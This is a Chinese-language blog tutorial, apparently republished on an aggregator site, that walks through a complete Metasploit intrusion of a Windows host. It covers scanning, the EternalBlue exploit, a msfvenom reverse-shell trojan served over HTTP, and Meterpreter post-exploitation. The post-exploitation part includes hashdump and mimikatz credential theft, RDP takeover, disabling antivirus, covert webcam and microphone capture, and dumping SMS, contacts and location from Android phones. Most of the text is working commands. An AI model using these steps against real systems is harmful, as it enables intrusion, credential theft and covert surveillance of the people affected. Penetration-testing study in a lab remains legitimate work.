metasploit完整的使用流程包括meterpreter后渗透

这篇具有很好参考价值的文章主要介绍了metasploit完整的使用流程包括meterpreter后渗透。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

主机发现

主机为win10
metasploit完整的使用流程包括meterpreter后渗透

基于ARP发现内网存活主机

auxiliary/scanner/discovery/arp_sweep
确认主机是否存活
metasploit完整的使用流程包括meterpreter后渗透

基于FTP服务

auxiliary/scanner/ftp/ftp_versionmetasploit完整的使用流程包括meterpreter后渗透

基于HTTP服务

auxiliary/scanner/http/http_version
metasploit完整的使用流程包括meterpreter后渗透

开启服务
metasploit完整的使用流程包括meterpreter后渗透

再次扫描
metasploit完整的使用流程包括meterpreter后渗透

基于SMB

auxiliary/scanner/smb/smb_version
metasploit完整的使用流程包括meterpreter后渗透

漏洞扫描

查看是否有ms17_010漏洞
metasploit完整的使用流程包括meterpreter后渗透

利用辅助模块,扫描该主机是否有该漏洞
metasploit完整的使用流程包括meterpreter后渗透

漏洞渗透利用

利用ms17_010

  1. 加载 永恒之蓝漏洞利用模块
    use exploit/windows/smb/ms17_010_eternalblue

  2. 输入 options 查看扫描模块需要配置的参数

  3. 设置
    3.1 然后我们配置了rhost (rhost指的是目标主机ip)
    set rhost ip
    3.2 然后我们配置了 lhost (lhost指的是 监控主机或攻击机 ip)
    set lhost ip
    3.3 然后我们配置了 lport (指的是监控的端口 )
    set lport ip
    注意端口必须没有被占用

  4. 然后我们执行扫描 输入 run 执行永恒之蓝漏洞利用

利用植入木马

metasploit完整的使用流程包括meterpreter后渗透

  1. 我们知道目标机器是win系统 所以使用msfvenom 生成一个win平台的木马

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=192.168.202.133 LPORT=4446 -e x86/shikata_ga_nai -b ‘\x00\x0a\xff’ -i 10 -f exe -o payload.exe
metasploit完整的使用流程包括meterpreter后渗透
metasploit完整的使用流程包括meterpreter后渗透

  1. 漏洞生成后 通过启动一个py服务将木马上传到目标机器

python -m SimpleHTTPServer 80
metasploit完整的使用流程包括meterpreter后渗透
在目标主机上下载
metasploit完整的使用流程包括meterpreter后渗透

  1. 配置监控程序我们使用了

use exploit/multi/handler
输入 options进入配置
metasploit完整的使用流程包括meterpreter后渗透

3.1 然后我们配置了 lhost (lhost指的是 监控主机或攻击机 ip)

set lhost ip

3.2然后我们配置了 lport (指的是监控的端口 )

set lport ip

注意端口必须和msfvenom 生成的木马端口一样才行

metasploit完整的使用流程包括meterpreter后渗透

  1. 配置攻击载荷 payload

set payload windows/meterpreter/reverse_tcp
执行利用等待目标机器执行木马
metasploit完整的使用流程包括meterpreter后渗透

  1. 目标机器执行了木马

利用成功并获得meterpreter
metasploit完整的使用流程包括meterpreter后渗透

后渗透

meterpreter

Meterpreter是Metasploit框架中的一个利器,作为漏洞溢出后的攻击载荷使用,攻击载荷在触发漏洞后会返回一个由我们控制的通道,可用于远程执行命令!
Metasploit提供了各个主流平台的Meterpreter版本,包括Windows、Linux,同时支持x86、x64平台,另外,Meterpreter还提供了基于PHP和Java语言的实现。Meterpreter的工作模式是纯内存的,好处是启动隐藏,很难被杀毒软件监测到。不需要访问目标主机磁盘,所以也没什么入侵的痕迹。除上述外,Meterpreter还支持Ruby脚本形式的扩展。所以Ruby语言还很有必要了解下。

meterpreter常用反弹类型

reverse_tcp
这是一个基于TCP的反向链接反弹shell, 使用起来很稳定

获取登录密码

首先获得一个有SYSTEM权限的meterpreter

很多人喜欢给在计算机设置自动登录 我们可以通过抓取自动登录的账户密码

run windows/gather/credentials/windows_autologin
metasploit完整的使用流程包括meterpreter后渗透

提示这证明本机并没有配置自动登录
还可以通过导出SAM数据库中的本地用户账号(注意需要提权到SYSTEM)
run post/windows/gather/smart_hashdump

metasploit完整的使用流程包括meterpreter后渗透

用户名 SID LM哈希: NTLM哈希1:::
zxh 1000 aad3b435b51404eeaad3b435b51404ee 0bc09c52a748936e8c961679004

使用 hashdump 获取密码(注意需要提权到SYSTEM才能使用)

终端内输入 run hashdump

metasploit完整的使用流程包括meterpreter后渗透

使用在线解析工具 : CMD5

NTLM哈希 例子:32ed87bdb5fdc5e9cba88547376818d4

假如此刻无法获取密码
使用load kiwi(使用kiwi模块需要system权限)
kiwi_cmd 模块可以让我们使用mimikatz的全部功能, mimikatz 的命令直接在kiwi_cmd里直接使用
终端输入 load kiwi
metasploit完整的使用流程包括meterpreter后渗透
creds_all 直接获取密码

metasploit完整的使用流程包括meterpreter后渗透

使用 kiwi_cmd sekurlsa::logonpasswords 获取密码

metasploit完整的使用流程包括meterpreter后渗透

ID kiwi参数和描述
1 creds_all:列举所有凭据
2 creds_kerberos:列举所有kerberos凭据
3 creds_msv:列举所有msv凭据
4 creds_ssp:列举所有ssp凭据
5 creds_tspkg:列举所有tspkg凭据
6 creds_wdigest:列举所有wdigest凭据
7 dcsync:通过DCSync检索用户帐户信息
8 dcsync_ntlm:通过DCSync检索用户帐户NTLM散列、SID和RID
9 golden_ticket_create:创建黄金票据
10 kerberos_ticket_list:列举kerberos票据
11 kerberos_ticket_purge:清除kerberos票据
12 kerberos_ticket_use:使用kerberos票据
13 kiwi_cmd:执行mimikatz的命令,后面接mimikatz.exe的命令
14 lsa_dump_sam:dump出lsa的SAM
15 lsa_dump_secrets:dump出lsa的密文
16 password_change:修改密码
17 wifi_list:列出当前用户的wifi配置文件
18 wifi_list_shared:列出共享wifi配置文件/编码

远程控制

环境准备

win10
metasploit完整的使用流程包括meterpreter后渗透

rdesktop
在线安装 rdesktop
metasploit完整的使用流程包括meterpreter后渗透


Debian,Ubuntu,kali下使用以下命令

apt-get install rdesktop


Centos/RedHat可以通过yum命令

yum -y install rdesktop

实战

使用rdesktop远程控制
说明:rdesktop是linux下支持Windows远程桌面连接的客户端程序,在linux系统下可通过它远程访问Windows桌面,支持多种版本。rdesktop是sourceforge下支持GPL协议的一个开源项目,采用RDP(Remote Desktop Protocol,远程桌面协议),几乎可以连接windows的所有版本

rdesktop常用参数

id 参数 描述
1 -u 账户名
2 -p 密码
3 -a 16 指使用16位色显示远程画面
4 -f 全屏模式(用Ctrl+Alt+Enter 组合键退出全屏)
5 -g 设置分辨率 如 : -g 1024x768
6 rdesktop -h 查看rdesktop使用帮助

rdesktop -u 用户名 -p 密码 -f IP

rdesktop -u zxh -p zxh -f -g 1024x720 192.168.202.139

metasploit完整的使用流程包括meterpreter后渗透

metasploit完整的使用流程包括meterpreter后渗透

metasploit完整的使用流程包括meterpreter后渗透

如果远程计算机没有启动远程功能我们可以在meterpreter中输入

启动远程桌面协议:run post/windows/manage/enable_rdp


2 通过vnc远程

metasploit完整的使用流程包括meterpreter后渗透

调用摄像头

环境准备

1 MSF-Metasploit Framework

2 一台windiows靶机

3 一台安卓设备,没有可以使用模拟器

实战

靶机获取到meterpreter后我们可以使用 webcam模块实现调用软,硬件摄像头

webcam模块支持命令

id 模块名 解释
1 webcam_list 列出靶机中的所有软,硬件摄像头列表,并编号
2 webcam_snap 可调用单个软,硬件摄像头拍照,默认调用第一个摄像头
3 webcam_stream 可调用单个软,硬件摄像头直播,默认调用第一个摄像头

1 webcam_list

2 webcam_snap 调用单个软,硬件摄像头拍照

id 参数 描述
1 -h 显示帮助
2 -i -i 1 “1”代表调用摄像头编号
3 -p -p /root "root"设置存储路径
4 -q -q 100 “100” 表示存储图片的质量默认为 50
5 -v -v false -v 2个参数 true 和 false 这个参数表示拍照后自动打开,默认参数为true
webcam_snap -i 1 -p po -q 100

3 webcam_stream 调用单个软,硬件摄像头直播

id 参数 描述
1 -h 显示帮助
2 -d -d 100 “100”=100秒 设置流持续时间为100秒 默认为1800
3 -i -i 1 “1”代表调用摄像头编号
4 -q -q 100 “100”指流质量 默认为50
5 -s -s live “live”指流文件路径 默认输出在当前目录(注意目录不存在不会自动创建)
7 -f -f live “live”指播放文件的存储地址 默认输出在当前目录
8 -v -v false -v 2个参数 true 和 false 这个参数表示拍照后自动打开,默认参数为true

meterpreter常用命令

background

返回,把meterpreter后台挂起

metasploit完整的使用流程包括meterpreter后渗透

sessions

查看当前建立的会话
sessions -i number 与会话进行交互,number表示第n个session,使用session -i 连接到指定序号的meterpreter会话已继续利用
sesssions -k number 与会话进行交互

metasploit完整的使用流程包括meterpreter后渗透

bgkill

杀死一个 meterpreter 脚本

bglist

提供所有正在运行的后台脚本的列表

bgrun

作为一个后台线程运行脚本

channel

显示活动频道

close

关闭通道

exit

终止 meterpreter 会话

quit

终止 meterpreter 会话

interact id

切换进一个信道

run

执行一个已有的模块,这里要说的是输入run后按两下tab,会列出所有的已有的脚本,常用的autoroute,hashdump,arp_scanner,multi_meter_inject等

irb

进入 Ruby 脚本模式

read

从通道读取数据write# 将数据写入到一个通道

run和bgrun

前台和后台执行以后它选定的 meterpreter 脚本

use

加载 meterpreter 的扩展

load/use

加载模块
Resource#执行一个已有的rc脚本

针对安卓手机

获取手机通讯录: dump_contacts

获取短信记录:dump_sms

控制实验手机发短信:send_sms -d 15330252525 -t
“hello”

获取实验手机GPS定位信息:geolocate

获取实验手机Wi-Fi定位信息:wlan_geolocate

控制实验手机录音:record_mic
-d 5

获取实验手机相机设备:webcam_list

控制实验手机拍照 :webcam_snap

直播实验手机摄像头:webcam_stream

针对Windows的一些命令

ps

查看进程:
metasploit完整的使用流程包括meterpreter后渗透

getpid

查看当前进程号:
metasploit完整的使用流程包括meterpreter后渗透

sysinfo

查看系统信息:
metasploit完整的使用流程包括meterpreter后渗透

route

查看完整网络设置:

metasploit完整的使用流程包括meterpreter后渗透

getsystem

自动提权:
metasploit完整的使用流程包括meterpreter后渗透

getuid

查看当前权限:
metasploit完整的使用流程包括meterpreter后渗透

pwd

查看当前处于目标机的那个目录:
metasploit完整的使用流程包括meterpreter后渗透

其他使用

查看目标机是否为虚拟机:run post/windows/gather/checkvm

关闭杀毒软件:run post/windows/manage/killav

启动远程桌面协议:run post/windows/manage/enable_rdp

列举当前登录的用户:run post/windows/gather/enum_logged_on_users

查看当前应用程序:run post/windows/gather/enum_applications

抓取目标机的屏幕截图:load espia ; screengrab

获取相机设备:webcam_list

控制拍照 :webcam_snap

直播摄像头:webcam_stream

控制录音:record_mic

查看当前目录:getlwd

导出当前用户密码哈希 run hashdump

用户名:SID:LM哈希:NTLM哈希:::

也可以使用下面这个命令导出 权限更高 run windows/gather/smart_hashdump

抓取自动登录的用户名和密码 run windows/gather/credentials/windows_autologin

直接获取明文密码(注意这个功能需要获取系统权限 获取系统权限需要输入getsystem)

shell

进入Windows的终端shell
metasploit完整的使用流程包括meterpreter后渗透

文件系统命令

文件交互指令

ID Command Description
1 cat 读取文件内容
2 cd 切换靶机目录
3 cp 复制文件到目标
4 mv 移动到目标
5 chmod 修改文件权限(比如chmod 777 shell.elf)
6 del / rm 删除靶机文件
7 dir 打印靶机目录
8 mkdir 在靶机上创建目录
9 rmdir 删除靶机目录
10 edit 编辑文件
11 getlwd 打印本地目录
12 getwd 打印靶机目录
13 lcd 更改本地目录
14 lls 列出本地目录
15 ls 列出靶机文件目录
16 lpwd 打印本地目录
17 pwd 打印工作目录
19 search 搜索文件 详情search -h

Linux权限理解

chmod 777 {文件名.后缀}

chmod 777 shell.elf

upload

上传文件到目标机主上,如upload setup.exe C:\windows\system32
download nimeia.txt /root/Desktop/ # 下载文件到本机上如:download C:\boot.ini /root/或者download C:\“ProgramFiles”\Tencent\QQ\Users\295******125\Msg2.0.db /root/

search

search 文件,如search -d c:\ -f*.doc

enumdesktops

用户登录数

ipconfig

查看IP地址
metasploit完整的使用流程包括meterpreter后渗透

PHP后门反弹连接

PHP后门反弹连接

永恒之蓝CVE-2017-0144

永恒之蓝CVE-2017-0144

震网三代CVE-2017-8464

震网三代CVE-2017-8464

永恒之黑CVE-2020-0796

永恒之黑CVE-2020-0796文章来源地址https://www.toymoban.com/news/detail-441331.html

到了这里,关于metasploit完整的使用流程包括meterpreter后渗透的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [课业] | 软件安全 | 使用渗透性工具Metasploit进行漏洞测试

    1.1 渗透测试技术的核心思想 渗透测试(Penetration Test)技术的核心思想是模仿黑客的特定攻击行为,也就是尽可能完整地模拟黑客使用的漏洞发现技术和攻击手段,对目标的安全性做深入的探测,发现系统最脆弱环节的过程。 渗透测试可以选择使用自动化测试工具,测试人员的

    2024年02月04日
    浏览(58)
  • 【2023最新版】超详细Metasploit安装保姆级教程,Metasploit渗透测试使用,看完这一篇就够了

    Metasploit 官方介绍 Metasploit是一个渗透测试框架,可以帮助您发现和利用漏洞。 Metasploit还为您提供了一个开发平台,您可以编写自己的安全工具或利用代码。 今天,我将指导您了解如何使用Metasploit的基础知识:如何安装Metasploit,使用框架以及利用漏洞。 下载地址:https://

    2024年02月13日
    浏览(68)
  • 数据分析完整流程一般包括哪几个环节/步骤

    问题定义: 确定需要解决的问题或目标,明确分析的方向和目的。 数据收集: 收集与问题相关的数据,可以包括从各种来源获取的结构化或非结构化数据。 数据清洗: 对收集到的数据进行清理,处理缺失值、异常值和重复值,确保数据质量。 数据探索(探索性数据分析

    2024年01月21日
    浏览(37)
  • metasploit(MSF)渗透超细解说 -- 小黑渗透工具

    metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!! 初心:    记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有

    2024年01月20日
    浏览(41)
  • Metasploit渗透测试框架

    一下笔记为观看课程得出https://www.bilibili.com/video/BV127411c7yE?p=6spm_id_from=pageDrivervd_source=5294f3174c841de416fef55d145e1e28 基于TCP协议收集主机信息 开放端口扫描db_nmap 查询网段内在线存活的主机 展示效果查询结果如下: 半连接的方式进行半连接扫描 使用auxiliary/sniffer下的psunffle模块进

    2024年02月10日
    浏览(48)
  • Metasploit渗透测试框架基础

    简介: Metaspolit是一个渗透测试框架,属于框架,是模块化组成的,是一个免费的可下的框架,通过它可以很容易的获取、开发并对计算机软件漏洞实现 metaspliot时候,计算机安全状况就永久的改变了 MSF:The Metasploit Framework Metasploit是一款开源的安全的漏洞检测工具,可以帮助

    2024年02月04日
    浏览(44)
  • Kali最强渗透工具-metasploit

    msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。 metasploit让复杂的漏洞攻击流程变的非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击 metasploit 攻击 windows 操作系统 msfconsol

    2024年02月15日
    浏览(44)
  • 靶机渗透(五)——metasploitable2

    metasploitable是一个Ubuntu-Linux虚拟机,用于测试常见漏洞。本质上是一个盒子中的渗透测试实验室,提供了执行渗透测试和渗透研究的安全场所。 靶机下载地址 用户名是 : msfadmin 密码是: msfadmin 开放了好多端口 大致过程 在kali中执行msfconsole,启动metasploit search irc,选择模块

    2024年02月05日
    浏览(54)
  • Metasploit——渗透攻击模块(Exploit)

    Metasploit常用命令、技术功能模块   Metasploit——辅助模块(Auxiliary)  目录 1.Exploit模块 2.生成Payload  3.Meterpreter常用命令 4.弱点扫描 Active exploits主动:攻击者主动向目标发起漏洞利用代码,触发漏洞             目标开放一个端口(服务),允许外界计算机连接这个端口(访问

    2024年02月11日
    浏览(47)
  • Kali最强渗透工具- metasploit

    数据来源   本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径。若观众因此作出任何危害网络安全的行为,后果自负,与本人无关。  得到ip地址我们能干嘛?         首先进行端口扫描 为什么要进行端口扫描?         端口扫描的作用就是发现目

    2023年04月16日
    浏览(41)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包